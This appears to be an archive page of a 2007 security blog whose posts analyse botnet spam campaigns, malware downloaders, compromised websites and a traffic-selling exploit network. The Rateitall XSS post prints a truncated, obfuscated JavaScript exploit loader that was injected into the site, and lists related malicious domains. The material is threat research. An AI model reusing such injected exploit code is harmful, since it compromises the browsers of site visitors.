Archive for 2007

« Older Entries
View All Spam

Christmas Storm

By Anonymous  •  December 28th, 2007  •   Spam

The storm botnet has been quiet since its last spam run during Halloween. But on Christmas eve the storm botnet started spreading Christmas themed email. The emails have similar content to previous storm emails, with a short message and a link.

The link points the the following website that advertises a strip show program. Clicking on the page will prompt the user to download stripshow.exe, which is the storm bot.

At the time that these emails were first being sent stripshow.exe was only detected by six of the 32 antivirus engines on viustotal.

The day after Christmas the theme of the emails changed to New Year. The emails have subjects such as:

New year wishes for you

New year ecard

Happy 2008

A fresh new year

Opportunities for the new year

Message for new year

We are currently still seeing these emails coming in.

Clicking the link will take you to the following page. The download does not start automatically but clicking on the 'click here' link will prompt you to download happynewyear2008.exe, also the storm bot.

These web sites are hosted on a fast flux network of computers that have already been compromised by the storm bot, making it very hard for anyone to take down the domains.

View All Spam

Celebrity bots sending image spam

By Anonymous  •  December 21st, 2007  •   Spam

Just after we posted our blog entry yesterday about the Pushdo/Celebrity botnet, another stream of celebrity malware-laden spam came in last night. As usual, the gang was using Angelina Jolie in the message.

If executed, the attachment downloads a spam bot and begins sending spam. Today the bot was sending out the following image spam at a considerable rate, we measured it at about 800 messages per hour.

Both the web sites heldbear.com and goodlone.com are hosting pages of an online drugstore called the Canadian Pharmacy. We checked the domain name registry and both sites were registered in China by someone named Liu Hai – which happens to be the name of a Chinese god of wealth and prosperity.

View All Spam

Pushdo: Malware Distribution Machine

By Anonymous  •  December 20th, 2007  •   Spam

A few days ago, a great analysis from SecureWorks on the Pushdo Trojan was published. The group behind this Trojan is none other than the Celebrity Gang, which we have commented on before as being a major spam player. Our observations indicate that this gang’s botnet is responsible for over 20% of spam at present.

Several interesting points came out of this analysis which illustrates the sophistication of this malware distribution mechanism:

  • The Pushdo Trojan itself is a downloader that seeks to download and install additional components from a remote server.
  • A custom HTTP protocol is used for communication instead of IRC.
  • The server distributes a number of malicious files, including spambots and password stealers.
  • The system is country ‘aware’, potentially limiting files to certain countries or groups of countries.
  • The malware keeps tracks of the computer’s IP address, hard drive serial number, OS version, and how many times a Pushdo variant has been run, which presumably is an anti-malware-analysis feature.
  • It also checks which anti-virus and firewall products are running. It doesn’t disable them, it just notes the processes and reports back to the server.

If the amount of spam this botnet is responsible for is anything to go by, the Pushdo/Celebrity gang has indeed succeeded in creating a sizeable botnet.

View All Malware

New Orkut worm takes us back in the wayback machine

By Anonymous  •  December 20th, 2007  •   Malware

I just love it how old news are recycled with a bit of a flare when they become relevant again. The latest Orkut worm reports talk about the technique that the worm writer has used to distribute its code. Quoting from the original article above: “It then downloads and executes a heavily obfuscated JavaScript”… looking at the code, I was expecting some whiz-bang brand-spankin-new cool-as-ice JS that you can’t even watch without eye protection. Alas, I was greeted with the good-ole’ “packed” obfuscation (see pdp’s post in it):

This brings us back to our August post on obfuscators (that are obviously easily detected and processed by us) which talked about the “packed” strand of JS obfuscation…

Hope that the industry will bring in something more exciting in the next wave of malicious code ;-)

Posted by Iftach Amit

Tags:    |    |    |  

View All Spam

E-card leads to spam bot download

By Anonymous  •  December 14th, 2007  •   Spam

This week we have been receiving spam emails that tell the recipient that they have received an ecard from yahoo greetings.

Clicking the link will take you to a forged americangreetings.com website. Both Internet Explorer 7.0 and Firefox browsers warn the user of a suspected phishing attempt.

If you ignore this warning you see the following page:

A message asks the user to update their flash player and provides a link to get the latest version. The link asks the user to download a malicious macromedia-flashplayerupdate.exe.

One of the main functions of this program is to send spam. We have observed it mass mailing e-card messages like the one above in order to lure more potential victims to the forged website. In addition to this it sends out short bursts of other types of spam. One type is this phishing spam:

Clicking the link will take you to the phishing website below that asks visitors to hand over personal details.

another type of spam being sent was this:

We calculated that one of these spam bots will send out almost 1400 messages an hour. The spam bot operates in bursts, presumably pausing to periodically download new templates and address lists.

View All Spam

End of year spike in spam volume

By Anonymous  •  December 13th, 2007  •   Spam

As each year draws to a close, there is a consistent pattern of increased spamming activity, typically focused around Christmas Spam .

In 2006, the traditional increase arrived early thanks mainly to the effects of the Stration worm. Below is our Spam Volume Index (SVI) for the latter half of 2006 – the SVI is a relative measure indicating the amount of spam being sent Worldwide from week to week. As we can see, during October 2006 spam volumes increased by 40 – 50%, and this elevated level became the new norm for the New Year.

SVI 2006

2007 became the year of sophisticated botnets, novel spam ideas (PDF spam, for example) and the merging of malware and spam activities. In our SVI below we can see that, despite the changing landscape, the familiar end-of-year spike is here again. It's a little late this year, but is of a similar scale to last year.

Unfortunately, if past years are anything to go by, this new volume can be expected to be maintained by the spammers. While we can hope for a drop-off in early 2008, experience suggests that this might not happen.

SVI 2007

View All Spam

Legit websites host multiple exploits

By Anonymous  •  December 13th, 2007  •   Spam

Earlier this week we commented that malware was increasingly being spread via the web. Today we received this harmless looking email that doesn’t contain much other than a short message and a reference to a website. The website appears to serve two different functions, one is to increase the search rankings of other pages and the second is to install malware on a visitor’s computer.

The website appears to have nothing malicious about it; however it is common for attackers to target high profile and trusted websites. By not altering the look of the site visitors will not even be aware of malicious activity going on in the background.
We quickly discovered that this page is not as innocent as it looks and it appears that someone has added two separate bits of code to the front page. Both seem to serve a different purpose.

In the page source are almost 200 links to four websites with different variations of cialis and viagra references. An HTML tag at the start of the links tells the browser not to display these links. The reason for this is to reduce the chance of someone noticing that the site is compromised, while still allowing search engines to read the links.
Most search engines use links in one website to increase the rank of the website being linked to. With enough compromised sites hosting links to a single website, that site can be given a higher ranking in a search engine. So if someone decided to search for ‘buy cialis online’, one of the sites pictured above may have enough links to it to put it near or at the top of the search results and increase the chance of the searcher going to that site.

The second bit of code is a JavaScript section that contains more JavaScript that is encoded in an attempt to hide the script’s real function.

When this is run it adds more JavaScript to the page. The script appears to be trying to exploit eight different vulnerabilities. Six of these were targeting Microsoft Internet Explorer through vulnerabilities in various ActiveX controls. The other two were targeting the Apple QuickTime plug-in.

Many of these vulnerabilities have software patches available but it only takes one vulnerable piece of software to make you a victim of this type of attack. You should always make sure your browser and other software have the latest updates installed. Disabling JavaScript and ActiveX in your browser can also reduce the chance of a successful attack.

View All Spam

Stock Spam II: Return of the Image

By Anonymous  •  December 13th, 2007  •   Spam

We have not seen much from the stock spammers lately. Stock spam levels have recently dwindled to almost insignificant levels:

But today, to our surprise, we saw a return of image stock spam which we have not seen for some months now. The numbers, while not huge, are significant. Moreover, the style of the message structure and image, complete with colorful randomized words, is identical to that seen earlier in the year. It seems the stock spammers, after a considerable underground hiatus, have picked up their tools and started again. Whether it will be a long-lived phenomenon, or the final death throes of stock spam, remains to be seen.

View All CybercrimeView All MalwareView All Vulnerabilities

The Traffic Stock Exchange

By Anonymous  •  December 10th, 2007  •   Cybercrime Malware Vulnerabilities

There is nothing new in traffic selling sites; in fact this growing business is almost as old as search engines. This huge market was adopted by hackers in order to transform desktops and sites under their control into cash making zombies. Sites that run crimeware-affiliation-networks are nothing new and we have been covering these for a long time both in this blog, as well as in our regular publications (Malicious page of the month, and the Trends Reports), but we just had to highlight this one…

While analyzing some malicious traffic we found a site called “robotraff.com”. This site is a market place for traffic buyer and sellers which claims to be a “stock exchange” for traffic: ”robotraff is the first automated stock exchange of the traffic, here you can buy the traffic by criteria interesting you and also to sell – under the price favorable to you.” [Quote from robotraff.com]


[Note the English mistakes.. original image taken from the robotraff.com website.]

This sound very good, the seller can utilize his site to gain some extra income and the buyer can control the traffic he gets. This evolution enables every site owner to get into the business of buying and selling traffic.

The technical process is fairly simple – the sellers add an Iframe (or script) that redirects his clients’ browser to robotraff which in turn redirect the browser to the traffic-buyer site.

This all sounds great, BUT (remember we found this site while analyzing malicious code?) This site has another property that raised our suspicion regarding the intended customers – the ability to buy traffic that corresponds specifically to a browser type and version…

Surly enough when crawling through the sites list of one of the sellers (see partial list below) we found a treasure of exploits, it was like going through a time machine or an exploits museum – we found exploits dating all the way back to 2001 along with modern alive-and-kicking exploits.

The attack is simple – the selling site had a hidden Iframe pointing to (through a redirect) robotraff. Robotraff then redirected the browser to the traffic-buyer site which in turn served malicious content.

Wonder what the ethics are for “shareholders” in this stock exchange, and what regulations are associated with running a stock there ;-)

Posted by Golan Yosef

Tags:    |    |    |  

View All CybercrimeView All Malware

Rated M for Malicious (RBN hit again?)

By Anonymous  •  December 9th, 2007  •   Cybercrime Malware

Rateitall.com has a permanent XSS hole which was used by criminal group(s?) to insert malicious code to the popular rating site.

The XSS attack appears in many of the site pages and can be identified by their “clever” review: “it is good tt” followed by some random characters and also by the random looking user name.

The attackers, using the said XSS hole, added a script tag with an “SRC” attribute pointing to “a34[REMOVED].info”.

11/15/2007 it is good


tti96


Another thing to note here is that the attackers (probably) managed to automatically generate users (since for each XSS attack a new user was created) which means that they managed to overcome the “Captcha” mechanism employed by Rate-It-All.
The injected obfuscated scripts, attempt to exploit some IE vulnerabilities such as the ANI vulnerability and MDAC.
eval(function(p,a,c,k,e,d){e=function(c){return(c35?
String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)
{d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};
while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,'g’),k[c])}}return p}(‘d=1d;d.3(“”);
d.3(“<”+”G>”);d.3(“h 6 = \\”1h://O.S/Z/1D.26\\”;”);d.3(“h j = \\\’\\\’;”);d.3(“D (i = 0; i < 6.7; )”);
d.3(“{“);d.3(“j += \\\’%u\\\’ + ((i+1<6.7)?6.r(i+1).q(16):\\\’1E\\\’)+6.r(i).q(16);”);d.3(“i = i + 2;”);
d.3(“}”);d.3(“w = g(\\”%f%f%1C%1F%1G%1J%1I%1H%1B%…”\\”);”);d.3(“F = g(j);”);
d.3(“h l = w+F;”);d.3(“5 = g(\\”%f%f\\”);”);d.3(“J = 20;”);d.3(“a = J+l.7;”);d.3(“C (5.7d.3(“B = 5.I(0, a);”);d.3(“8 = 5.I(0, 5.7-a);”);d.3(“C(8.7+a<3m) 8 = 8+8+B;”);d.3(“E = 3i 3j();”);
d.3(“D (i=0;i<2S;i++) E[i] = 8 + l;”);d.3(““);d.3(“”);
d.3(““);d.3(““);’,62,212,’|||write|uefef|bigblock|…[REMOVED]…|ubdb4′.split(‘|’),0,{}))
The downloaded exe file was identified only by 2 of the AV engines available at Virustotal:

The “a34[REMOVED].info” domain was registered in 13-11-20007 to an entity in Culver City California (although the country was stated as CM, the phone number area code points to CA), is hosted in the UK and was registered by “Regtime Ltd” a Russian domain registration company. Its’ domain servers are NS0.HQHOST.NET and NS1.HQHOST.NET which were used by other notorious sites.
The following domains are registered under the same IP address as “a34[REMOVED].info”:
  1. xxxrusexy.com
  2. 2005leftforum.org
  3. anubis3d.info
  4. autonewsz.com
  5. blog.sportsinoutlook.com
  6. centralpartnership.org
  7. devrona.com
  8. easy-loans-for-you.com
  9. five.my1sttry.com
  10. foundquickly.com
  11. funsprogram.com
  12. gnt.devrona.com
  13. gthack.info
  14. idealfoto.ru
  15. infohosters.org.ua
  16. inlink.org.ua
  17. joden.org.ua
  18. maillive.org
  19. motofix.info
  20. msngo.info
  21. pornosmska.ru
  22. pornxblog.com
  23. princgames.com
  24. runegames.com
  25. sparko-soft.com
  26. sportsinoutlook.com
  27. swcidurango.org
  28. theporn.tv
  29. vdomik.com.ua
  30. witokas.com

It’s interesting to note that although the hosting company’s site looks completely “Americanized” (hqhost.net), the link we have found in one of their support forums for contacting support is surprisingly enough in Russian:

12/6/2007 – update – rateitall has reported that they have fixed the XSS issue and purged the malicious pages from their website.
Posted by Golan Yosef

Tags:    |    |    |  

« Older Entries